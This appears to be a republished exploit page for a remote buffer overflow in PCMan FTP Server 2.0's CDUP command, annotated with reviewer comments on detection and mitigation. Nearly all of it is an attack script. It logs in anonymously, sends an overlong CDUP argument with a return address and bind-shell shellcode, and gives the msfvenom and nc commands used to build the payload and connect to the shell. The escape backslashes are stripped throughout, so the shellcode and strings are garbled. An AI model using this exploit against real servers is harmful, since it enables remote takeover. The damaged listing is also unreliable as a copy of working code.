
Published on March 26th, 2019 📆 | 4850 Views ⚑


PCMan FTP Server 2.0 CDUP Remote Buffer Overflow



PCMan FTP Server version 2.0 CDUP remote buffer overflow exploit.

MD5 | db06526f034129dc1fe951edae491f7a

#!/usr/bin/python
import socket, sys, os, time

# Start-up banner: title, date, affected software, the one platform the
# author reports testing on (Windows XP Professional SP2), and author credits.
# NOTE(review): the bare "n" characters at the start and end of these strings
# look like escape sequences damaged when the page was extracted, so this
# listing is not a faithful copy of the original file; the MD5 shown on the
# page presumably refers to the original and will not match this text.
print "n===============================n"
print " PCMan FTP Server 2.0 - 'CDUP' Remote Buffer Overflow n "
print " Date: 23/03/2019 n "
print " Affected Software: PCMan 2.0 n "
print " Tested on Mincrsoft Windows XP Professional Version 2002 SP2 n "
print " Author: Sachin Wagh n "
print " Twitter: @tiger_tigerboy n "
print "=================================n"

# Author's notes on how the payload below was produced and used. They name a
# Windows bind-shell payload, i.e. one that opens a listening TCP port on the
# host running the FTP server.
# NOTE(review): the two notes disagree on the port (1144 vs 4444), so neither
# number is a reliable network indicator without analysing the original bytes.
# Detection: with a bind shell, the host-side signals are a new listening
# socket owned by the FTP server process and a command interpreter spawned as
# its child; an egress/ingress filter that only admits the FTP ports blocks
# the follow-up connection.
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b 'x0ax00x0d' -f c
#nc taget_ip 4444

# Payload string, concatenated from adjacent literals. It is opaque data as
# far as this script is concerned: it is only appended to the CDUP argument.
shellcode=("xbbxb6x9bxb7xa8xdaxdfxd9x74x24xf4x5ax29xc9xb1"
"x53x83xeaxfcx31x5ax0ex03xecx95x55x5dxecx42x1b"
"x9ex0cx93x7cx16xe9xa2xbcx4cx7ax94x0cx06x2ex19"
"xe6x4axdaxaax8ax42xedx1bx20xb5xc0x9cx19x85x43"
"x1fx60xdaxa3x1exabx2fxa2x67xd6xc2xf6x30x9cx71"
"xe6x35xe8x49x8dx06xfcxc9x72xdexffxf8x25x54xa6"
"xdaxc4xb9xd2x52xdexdexdfx2dx55x14xabxafxbfx64"
"x54x03xfex48xa7x5dxc7x6fx58x28x31x8cxe5x2bx86"
"xeex31xb9x1cx48xb1x19xf8x68x16xffx8bx67xd3x8b"
"xd3x6bxe2x58x68x97x6fx5fxbex11x2bx44x1ax79xef"
"xe5x3bx27x5ex19x5bx88x3fxbfx10x25x2bxb2x7bx22"
"x98xffx83xb2xb6x88xf0x80x19x23x9exa8xd2xedx59"
"xcexc8x4axf5x31xf3xaaxdcxf5xa7xfax76xdfxc7x90"
"x86xe0x1dx0cx8ex47xcex33x73x37xbexf3xdbxd0xd4"
"xfbx04xc0xd6xd1x2dx69x2bxdax40x36xa2x3cx08xd6"
"xe2x97xa4x14xd1x2fx53x66x33x18xf3x2fx55x9fxfc"
"xafx73xb7x6ax24x90x03x8bx3bxbdx23xdcxacx4bxa2"
"xafx4dx4bxefx47xedxdex74x97x78xc3x22xc0x2dx35"
"x3bx84xc3x6cx95xbax19xe8xdex7exc6xc9xe1x7fx8b"
"x76xc6x6fx55x76x42xdbx09x21x1cxb5xefx9bxeex6f"
"xa6x70xb9xe7x3fxbbx7ax71x40x96x0cx9dxf1x4fx49"
"xa2x3ex18x5dxdbx22xb8xa2x36xe7xc8xe8x1ax4ex41"
"xb5xcfxd2x0cx46x3ax10x29xc5xcexe9xcexd5xbbxec")





# Host and TCP port are read from the command line; there is no argument
# count check, so a missing argument raises IndexError.
target = sys.argv[1]
port = int(sys.argv[2])

# Oversized CDUP argument, built in four parts: 2006 filler characters, a
# value the author describes as a JMP ESP address in SHLWAPI.dll, a short
# padding run, then the payload string.
# NOTE(review): this depends on a fixed module address and on stack data
# being executable, the conditions ASLR and DEP exist to remove. The author
# lists only Windows XP SP2 as tested. The page cites no patch or fixed
# version, so replacing or network-isolating the server is the practical
# mitigation - verify against vendor information.
evil="A"*2006
evil+="x27xb1xfax77" #SHLWAPI.dll this dll have to JMP to ESP address
evil+="x90"*20
evil+=shellcode
#evil+="x90"*(2220-len(evil))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port)) #Connect to FTP server
s.recv(1024) #Receive 1024 bytes from FTP server
# NOTE(review): this message is printed before any command has been sent, and
# every recv() result below is discarded, so the output says nothing about
# what the server actually did.
print "[+] Payload Sent Successfully"
# The session authenticates as anonymous first; whether the CDUP handler is
# reachable without a login is not shown here. Disabling anonymous access
# narrows who can reach it.
s.send('USER anonymousrn')
s.recv(1024)
s.send('PASS anonymousrn')
s.recv(1024)
# Detection: RFC 959 defines CDUP with no argument, so any CDUP line carrying
# a parameter, let alone one over 2000 characters, is anomalous and can be
# alerted on or dropped by an FTP-aware proxy or IDS rule.
s.send('CDUP ' + evil + 'rn') #Send CDUP vulnerable command with our evil data
s.recv(1024)
s.close() #Close the socket
